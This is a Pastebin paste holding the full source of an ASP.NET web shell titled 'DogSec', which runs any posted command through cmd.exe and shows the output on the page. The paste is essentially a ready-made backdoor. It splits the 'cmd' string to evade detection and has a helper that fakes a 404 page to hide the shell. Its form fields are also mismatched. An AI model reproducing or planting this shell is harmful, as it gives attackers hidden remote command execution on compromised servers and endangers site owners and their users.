Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <%@ Page Language="C#"%>
- <%@ Import Namespace="System" %>
- <script runat="server">
- string stdout = "";
- string stderr = "";
- void Page_Load(object sender, System.EventArgs e) {
- string p1 = "c";
- string p3 = "d";
- string p4 = "/";
- if (Request.Form["a"] != null) {
- string p2 = "m";
- System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo(p1+p2+p3, p4+p1 + Request.Form["c"]);
- procStartInfo.CreateNoWindow = true;
- procStartInfo.RedirectStandardError = true;
- procStartInfo.UseShellExecute = false;
- procStartInfo.RedirectStandardOutput = true;
- System.Diagnostics.Process p = new System.Diagnostics.Process();
- p.StartInfo = procStartInfo;
- p.Start();
- stderr = p.StandardError.ReadToEnd();
- stdout = p.StandardOutput.ReadToEnd();
- }
- }
- void die() {
- //HttpContext.Current.Response.Clear();
- HttpContext.Current.Response.StatusCode = 404;
- HttpContext.Current.Response.StatusDescription = "Not Found";
- HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
- HttpContext.Current.Server.ClearError();
- HttpContext.Current.Response.End();
- }
- </script>
- <html>
- <head>
- <title>DogSec</title>
- </head>
- <body onload="document.something.c.focus()">
- <form method="post" name="something">
- cmd /c <input type="text" name="a"/>
- <input type="submit"><br/>
- Output:<br/>
- <pre><% = stdout.Replace("<", "<") %></pre>
- <br/>
- <br/>
- <br/>
- Error:<br/>
- <pre><% = stderr.Replace("<", "<") %></pre>
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement